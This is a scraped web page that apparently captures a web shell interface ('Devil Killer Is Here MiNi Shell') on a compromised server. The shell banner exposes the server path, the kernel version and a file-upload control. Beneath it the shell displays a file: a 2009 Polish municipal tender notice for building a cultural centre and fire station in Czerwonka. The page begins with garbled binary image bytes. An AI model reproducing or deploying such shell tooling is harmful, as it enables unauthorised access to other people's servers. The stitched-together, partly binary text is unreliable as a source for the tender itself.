JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090827/294688-N-2009.html

<p class="kh_header"><b>Czerwonka Włościańska: Budowa  Gminnego Ośrodka Kultury w Czerwonce</b><br>
<b>Numer ogłoszenia: 294688 - 2009; data zamieszczenia: 27.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Czerwonka , 38 38, 06-232 Czerwonka Włościańska, woj. mazowieckie, tel. 0297179505, 7179521, faks 029 7179517.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czerwonka.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa  Gminnego Ośrodka Kultury w Czerwonce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa jednokondygnacyjnego budynku (o rzucie  w kształcie litery L), z którego część wschodnia będzie przeznaczona na potrzeby Gminnego Ośrodka Kultury GOK) , zaś część zachodnia na potrzeby Ochotniczej Straży Pożarnej (OSP).  Działka, na której będzie realizowane przedsięwzięcie jest obecnie zabudowana budynkiem gospodarczym przeznaczonym do rozbiórki. Rozbiórka budynku wchodzi w zakres robót objętych niniejszym zamówieniem. 

Zakres robot:
- rozbiórka istniejącego budynku gospodarczego
- budowa nowego budynku  (na potrzeby GOK i OSP) 
- wykonanie  instalacji wodnej i kanalizacyjnej
- wykonanie instalacji centralnego  ogrzewania wraz kotłownią na paliwo stałe
-wykonanie instalacji elektrycznej
- zagospodarowanie działki ( parkingi, drogi manewrowe, ogrodzenie)

 Podstawowe parametry obiektu:
 Budynek parterowy o wymiarach: 20,77 m (długość) x 27,27m(szerokość); 10m (wysokość) 
-Powierzchnia zabudowy : 493 m2
-Kubatura:                           1700m3
-Powierzchnia użytkowa    435,55 

 Technologia:
- Ławy i stopy fundamentowe  betonowe wylewane. 
-Ściany zewnętrzne jednowarstwowe PTH grub. 38 
-Ściany wewnętrzne nośne- gazobeton 24cm 
-Ściany wewnętrzne działowe - 12 cm gazobeton i płyta k-g na ruszcie stalowym
-izolacje ścian - styropian , izolacja dachu- wełna mineralna 18cm 
-strop- płyty kanałowe prefabrykowane.
-Ścianki kolankowe wzmocnione rdzeniami żelbetowymi 
-więźba dachowa płatwiowo-kleszczowa - drewniana.
-pokrycie dachu- blacho dachówka
Szczegółowy zakres robót przedstawiono w przedmiarach  robót.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.11.13.00-1, 45.11.12.00-0, 45.26.23.10-7, 45.26.23.11-4, 45.32.00.00-6, 45.26.25.22-6, 45.26.12.10-9, 45.43.00.00-0, 45.42.10.00-4, 45.42.11.10-8, 45.41.00.00-4, 45.44.00.00-3, 45.32.10.00-3, 45.45.00.00-6, 45.33.20.00-3, 45.23.13.00-8, 45.23.24.00-6, 45.33.11.00-7, 45.33.11.10-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca  przystępujący  do przetargu jest obowiązany wnieść wadium w  wysokości   20.000 zł . (słownie:  Dwadzieścia tysięcy złotych).
Wadium może być wniesione w jednej z następujących form :

a)pieniądzu, na rachunek  bankowy w  Kredyt Bank S.A   fila  Maków Maz.

Nr  rachunku 90 1500 1588 1215 8001 4749 0000

b)poręczeniach bankowych lub poręczeniach SKOK, z tym, że poręczenie SKOK jest zawsze poręczeniem pieniężnym
c)gwarancjach bankowych,
d)gwarancjach ubezpieczeniowych, 
e)poręczeniach udzielanych przez podmioty, o których mowa  w  art. 6b ust..5 pkt.2 ustawy  z  dnia 9 listopada 2000 r. o  utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz.  nr 109, poz.1158 z póżn. zmianami ). 
Wykonawca wnoszący wadium przelewem powinien złożyć  polecenie przelewu z takim wyprzedzeniem, aby  wpłata  wadium została zaksięgowana na   rachunku Zamawiającego przed upływem  terminu  składania ofert. W każdym innym przypadku uważać się będzie, że Wykonawca nie wniósł wadium. 
Dokumentem, na podstawie którego zamawiający stwierdzi wpłatę wadium  będzie informacja  o saldzie na rachunku  bankowym podanym wyżej, z godziny 10:00 w dniu  17 września  2009r.
Wykonawca, którego oferta nie będzie zabezpieczona wadium odpowiadającemu powyższym wymaganiom, zostanie wykluczony z postępowania  na podstawie art. 24. ust. 2pkt. 4 ustawy. 
Wadium wniesione w pieniądzu zamawiający zwróci wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonymi o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wykonawcy.
Zamawiający niezwłocznie zwróci wadium, jeżeli:
-upłynie termin związania ofertą
-zostanie zawarta umowa z wybranym Wykonawcą 
-zamawiający unieważni postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin ich wnoszenia.
Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca - w odpowiedzi na wezwanie skierowane przez Zamawiającego zgodnie z art. 26 ust.3 ustawy pzp- nie uzupełni dokumentów lub oświadczeń , o których mowa w art.25 ust.1 ustawy, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.

Zamawiający niezwłocznie zwróci wadium na wniosek wykonawcy ,który wycofał ofertę przed upływem terminu składania ofert; który został wykluczony z postępowania;  którego oferta została odrzucona.  
Zamawiający zażąda ponownego wniesienia wadium przez Wykonawców , którzy zostali wykluczeniu z postępowania lub których ofertę odrzucono, jeżeli w wyniku postępowania protestacyjnego czynność wykluczenia  Wykonawcy lub odrzucenia oferty została unieważniona.  W takim przypadku Wykonawca ma obowiązek ponownego wniesienia wadium w terminie wyznaczonym przez Zamawiającego. Nie wniesienia wadium na wezwanie Zamawiającego  skutkować będzie wykluczeniem z postępowania na podstawie art. 24 ust.2  ustawy.
Wykonawca, którego oferta została wybrana traci wadium wraz z odsetkami na rzecz Zamawiającego w przypadku gdy:
-odmówi podpisania umowy na warunkach określonych w ofercie
- nie  wniesie zabezpieczenia należytego wykonania umowy .
-zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział Wykonawcy nie podlegający wykluczeniu na podstawie art.24 ust. 1i2 , spełniający następujące warunki:
1. Potencjał ekonomiczno - finansowy: 
Wykonawca musi wykazać dysponowanie własnymi środkami finansowymi
(środki własne na rachunku lub kredyt , o ile środki z kredytu  nie są przeznaczone na zrealizowanie innego konkretnego celu) i - lub zdolnością kredytową w wysokości nie mniejszej niż  1.000.000 zł.
Środki finansowe  podane w  zaświadczeniu z banku  w  walutach innych niż  PLN  będą przeliczane  wg średniego kursu NBP na dzień wystawienia  zaświadczenia. 
Wykonawcy wspólnie ubiegający się o udzielenie zmówienia ( konsorcjum)  powyższy warunek  spełniają łącznie. 

2.Potencjał  kadrowy: 
 Wykonawca dysponuje lub będzie dysponował  osobami legitymującymi się doświadczeniem zawodowym i kwalifikacjami odpowiednimi do stanowisk jakie zostaną im powierzone. W ofercie przetargowej Wykonawca przedstawi kandydatów  posiadających  wymagane polskim prawem uprawnienia  w danej specjalności do obsadzenia niżej podanych stanowisk:

-Kierownik budowy - 1 osoba- Wymagane uprawnienia  budowlane w specjalności ogólnobudowlanej. Minimalne wymagane doświadczenie zawodowe: Jedno zadanie  o wartości minimum 500 tys zł  z  zakresu budowy i- lub rozbudowy i- lub przebudowy  budynku  mieszkalnego lub użyteczności publicznej, na których pełnił funkcję  Kierownika Budowy lub Kierownika Robót.
 Kierownicy robót: instalacje wod - kan i co - 1 osoba- wymagane uprawnienia budowlane w zakresie instalacji sanitarnych lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów.

instalacje elektryczne - 1 osoba - wymagane uprawnienia w zakresie  sieci  i instalacji elektrycznych, lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów.
Kierownik budowy  i kierownicy  robót  powinni być członkami Izby Inżynierów Budownictwa ubezpieczonymi od odpowiedzialności cywilnej.

Wykonawcy wspólnie ubiegający się o udzielenie zmówienia ( konsorcjum)  powyższy warunek  spełniają łącznie.

W przypadku powierzenia robót podwykonawcom, wymagania dotyczące kwalifikacji kierownika robót  obowiązują również podwykonawców. 
Zamawiający nie zaakceptuje podwykonawców, którzy nie  będą dysponować personelem o wymaganych wyżej  kwalifikacjach.
3. Doświadczenie : Wykonawca musi wykazać , że w okresie 5 lat poprzedzających datę składania ofert zrealizował   co najmniej  dwa zadania  o charakterze i złożoności  i wartości porównywalnej z przedmiotem zamówienia.
 Przez jedno  porównywalne  zadanie  rozumie się  budowę , rozbudowę lub  przebudowę   budynku  mieszkalnego lub obiektu użyteczności publicznej o  wartości minimum 1 mln zł. Obiekt  użyteczności publicznej  -zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. W sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. z 2002 nr 75 poz. 69 ze zm)- to: budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, opieki zdrowotnej, opieki społecznej i socjalnej, obsługi bankowej, handlu, gastronomii, usług, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, świadczenia usług pocztowych lub telekomunikacyjnych oraz inny ogólnodostępny budynek przeznaczony do wykonywania podobnych funkcji, w tym także budynek biurowy i socjalny.
Wykonawcy wspólnie ubiegający się o udzielenie zmówienia ( konsorcjum)  powyższy warunek  spełniają łącznie. 

W przypadku kontraktów zawartych w walutach innych niż PLN, należy ich wartość  przeliczyć na PLN wg średniego kursu NBP z dnia podpisania kontraktu, podając datę podpisania umowy i kurs waluty. 

 
Wykonawcy wspólnie ubiegający się o udzielenie zmówienia ( konsorcjum)  powyższy warunek spełniają łącznie. 

 Ocena spełnienia warunków uczestnictwa w przetargu będzie dokonana w formule  spełnia- nie spełnia na podstawie dokumentów wymienionych poniżej.  

 Warunki zostaną uznane za spełnione, jeżeli  Wykonawca wykaże, że spełnia  wszystkie wymagania określone w  punkcie od 1 do 3. 
Niespełnienie któregokolwiek z nich  oznaczać będzie, że Wykonawca nie spełnia warunków uczestnictwa w przetargu. 

Inne szczególne warunki, którym podlega realizacja zamówienia:
(1). Zamówienie będzie realizowane zgodnie z prawem polskim, w szczególności z ustawą  Prawo budowlane.  Wykonawca musi zapewnić wykonanie robot zgodnie z prawem polskim, w szczególności z przepisami techniczno-budowlanymi, przepisami dotyczącymi samodzielnych funkcji technicznych w budownictwie oraz z przepisami dotyczącymi wyrobów i materiałów stosowanych w budownictwie. 

(2) Podwykonawstwo :  
Zamawiający dopuszcza  realizację zamówienia przy udziale podwykonawców .
Wykonawca  może powierzyć podwykonawcom:
- rozbiórkę istniejącego budynku i uporządkowanie terenu
-wykonanie instalacji wod-kan  i centralnego ogrzewania,
-wykonanie  instalacji elektrycznej , 
-ogrodzenie i zagospodarowanie terenu.
Pozostałe elementy robót generalny wykonawca zrealizuje samodzielnie. Podwykonawca nie może zlecić robót sobie powierzonych dalszym podwykonawcom..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> DO OCENY SPEŁNIENIA WARUNKÓW UDZIAŁU W PRZETARGU wymagane są NASTĘPUJĄCE DOKUMENTY I OŚWIADCZENIA : 
1. Status prawny - wymagane dokumenty
(1)Aktualny - wystawiony nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert-odpis z właściwego rejestru albo  aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej . 
(2)Oświadczenie, że Wykonawca  spełnia  warunki udziału w postępowaniu  zawarte w  art. 22 ust.1 ustawy Prawo zamówień publicznych oraz  nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych. 
(3)Pełnomocnictwo do  podpisania oferty lub podpisania oferty i zawarcia umowy  w imieniu Wykonawcy - o ile  osoba/y podpisujące ofertę  nie posiadają takich uprawnień na podstawie dokumentów rejestrowych  firmy.
(4) Aktualną -wydaną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert- informację  z   Krajowego Rejestru  Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby   w zakresie określonym w art. 24 ust.1 pkt. 4-8 ustawy pzp .Powyższa informacja, dotyczy urzędujących członków władz firmy, umieszczonych w rejestrze firmy. 
(5) Aktualną - wydaną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert- informację  z   Krajowego Rejestru  Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby   w zakresie określonym art. 24 ust. 1 pkt 9 ustawy Pzp. Powyższa informacja , nie dotyczy osób fizycznych i spółek cywilnych , o ile wspólnikami są wyłącznie osoby fizyczne.  Spółki cywilne, których wspólnikami są przedsiębiorcy nie będący osobami  fizycznymi  mają obowiązek załączyć  tę informację .    
(6) Aktualnych - wystawionych nie wcześniej niż 3 miesiące  przed upływem terminu składania ofert- zaświadczeń    właściwego naczelnika  urzędu skarbowego oraz właściwego oddziału ZUS lub KRUS  potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków ,opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń , że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymania w całości wykonania decyzji właściwego organu. 

2. Potencjał ekonomiczno - finansowy - wymagane dokumenty:  
Informacja banku, lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym
Wykonawca posiada rachunek, potwierdzająca, że wysokość posiadanych środków
finansowych lub-i zdolność kredytowa Wykonawcy nie jest mniejsza od 1.000.000 PLN. Powyższe dokumenty muszą być wystawione nie wcześniej niż  3 miesiące przed upływem terminu składania ofert.Środki finansowe  podane w  zaświadczeniu z banku  w  walutach innych niż  PLN  będą przeliczane  wg średniego kursu NBP na dzień wystawienia  zaświadczenia.
W przypadku Wykonawców  wspólnie ubiegających się o zamówienie , informację  przedkłada ten lub ci, którzy potwierdzają spełnienie warunku.

3 Potencjał  kadrowy - wymagane dokumenty: 
 Wykaz osób,(zgodny z treścią  załącznika nr 2 do SIWZ), które będą kierować wykonaniem zamówienia. Do informacji należy załączyć kopię uprawnień budowlanych oraz kopię aktualnego zaświadczenia o  przynależności do właściwej Okręgowej Izby Inżynierów Budownictwa dla osób  wskazanych  do pełnienia obowiązków kierownika budowy i kierownika robót .  W przypadku Wykonawców  wspólnie ubiegających się o zamówienie , informację  przedkłada ten lub ci, którzy potwierdzają spełnienie warunku.
W przypadku, gdy Wykonawca wskaże  w wykazie osoby , którymi będzie dysponował, musi załączyć pisemne  zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.
4. Doświadczenie  zawodowe - wymagane dokumenty 
 Informacja o doświadczeniu Wykonawcy (zgodna z treścią  załącznika nr 3 do SIWZ). W informacji należy zamieścić wykaz ważniejszych robót  zrealizowanych w okresie ostatnich 5 lat , lub z okresu działalności , jeśli jest prowadzona krócej niż  5 lat. Wykaz powinien  zawierać zadania  odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia. Informacja musi potwierdzać spełnienie warunku w zakresie doświadczenia zawodowego Wykonawcy, zgodnie z wymaganiem opisanym w SIWZ.  
Na potwierdzenie wykonania wskazanych zadań z należytą starannością wymagana jest kopia  protokołów odbiorów końcowych wykonanych robót lub referencje od właściwych zamawiających.  Z treści załączonych protokołów lub referencji musi wynikać jednoznacznie, że dotyczą one zadań  porównywalnych z przedmiotem przetargu - w rozumieniu zapisu SIWZ- punkt 8.3 Instrukcji dla Wykonawców. 
Maksymalnie należy wykazać 5 zadań.
W przypadku Wykonawców  wspólnie ubiegających się o zamówienie , informację  przedkłada ten lub ci, którzy potwierdzają spełnienie warunku.


W przypadku , gdy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium RP, stosuje się  przepisy § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane. (Dz. U. z 2006r., Nr 87, poz.605 ze zm.).
Wykonawca, o którym mowa wyżej, zamiast dokumentów wymienionych w punkcie 1.  ppkt (1); (5);(6)  składa odpowiedni dokument lub dokumenty  wystawiony zgodnie z prawem kraju , w którym ma siedzibę lub miejsce zamieszkania , potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości
b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie
c) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotnie albo, że uzyskał przewidziane prawem zwolnienie , odroczenie , lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.

Jeżeli Wykonawca ma  siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej  Polskiej, zamiast  dokumentów wymienionych w  punkcie 1.   ppkt (4) składa zaświadczenie z właściwego organu sądowego  lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dotyczą, w zakresie określonym w art.24 ust.1 pkt 4-8 ustawy Pzp. 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się  dokumentów  o których mowa  wyżej , zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem , właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania.  
Dokumenty i oświadczenia , o których mowa wyżej, powinny być wystawione w terminach analogicznych do odpowiadających im dokumentów wyszczególnionych w pkt.1 (1);(4);(5);(6).

Wykonawcy składający ofertę wspólną (konsorcjum).
Oferta składana  przez konsorcjum (dwa lub więcej podmiotów gospodarczych działających wspólnie) musi spełniać  następujące wymagania:
1).Dokumenty  wymienione w pkt.1 ppkt. (1); (4); (5); (6) wymagane są od każdego podmiotu.
2).Oświadczenie wymienione w pkt. 1 (2) powinno być złożone w imieniu wszystkich Wykonawców i podpisane przez każdego Wykonawcę lub Pełnomocnika ustanowionego do reprezentowania ich w postępowaniu,
3). Do oferty będzie załączone  pełnomocnictwo  dla  wyznaczonego  jednego z podmiotów jako Lidera konsorcjum. Pełnomocnictwo musi być podpisane przez uprawnionych przedstawicieli pozostałych podmiotów i złożone w oryginale lub notarialnie potwierdzonej kopii. 
4). Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu, lub  reprezentowania w postępowaniu i do zawarcia umowy. 
5).Zamiast pełnomocnictwa może być załączona umowa konsorcjum, regulująca współpracę podmiotów składających ofertę wspólną..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.czerwonka.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Czerwonka. 06-232 Czerwonka Włościańska.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.09.2009 godzina 10:00, miejsce: Urząd Gminy Czerwonka (sekretariat)
06-232 Czerwonka Włościańska.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zadanie objęte przetargiem jest przedmiotem wniosku o dofinansowanie z Europejskiego Funduszu Rolnego na Rzecz Rozwoju Obszarów Wiejskich w ramach Programu Rozwoju Obszarów Wiejskich 2007-2013.  (PROW) . 
 W przypadku przyznania Zamawiającemu  dofinansowania  z  PROW , roboty  w części obiektu przeznaczonego na potrzeby Gminnego Ośrodka Kultury będą podlegały rozliczeniu według procedur  właściwych dla tego programu.

Przedmiot zamówienia jest niepodzielny pod  względem  konstrukcyjnym, technicznym i technologicznym, w związku z czym musi być realizowany  przez jednego wykonawcę . 

Zakres rzeczowo - finansowy został rozdzielony przedmiarami na 2 części, z uwagi na fakt, iż  ewentualne dofinansowanie unijne  będzie dotyczyć  tylko części obiektu przeznaczonej na potrzeby Gminnego Ośrodka Kultury. 
Pozostała część jest finansowana w 100% ze środków własnych gminy. 

Przedmiary robót zostały sporządzone odrębnie dla  części obiektu  przeznaczonej na potrzeby GOK i odrębnie dla części przeznaczonej na potrzeby OSP.  W taki sam sposób  należy sporządzić kosztorysy ofertowe  ( dotyczy wszystkich branż) i Zbiorcze Zestawienia  Kosztów .
Pomimo  wprowadzonego podziału robót nie jest to  zamówienie   udzielane w częściach, a podział   został dokonany wyłącznie w celu zapewnienia przejrzystości  rozliczenia  projektu w przypadku otrzymania dotacji  z PROW.

2. Informacje dotyczące umowy w sprawie niniejszego zamówienia. 
 Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru wykonawcy. Warunki wprowadzenia zmian są następujące: 
1)zmiana terminu realizacji przedmiotu umowy  będzie możliwa w przypadku:
a)wystąpienia okoliczności niezależnych od Wykonawcy przy zachowaniu przez niego należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu zamówienia,
b)wstrzymania przez Zamawiającego wykonania robót nie wynikających z przyczyn leżących po stronie Wykonawcy. Powyższe nie dotyczy okoliczności wstrzymania robót przez inspektorów nadzoru w przypadku stwierdzenia nieprawidłowości w wykonywaniu przedmiotu umowy. 
c)konieczności wprowadzenia przez Zamawiającego korekt w dokumentacji projektowej (usunięcie wad projektu lub wprowadzenie rozwiązań zamiennych)  
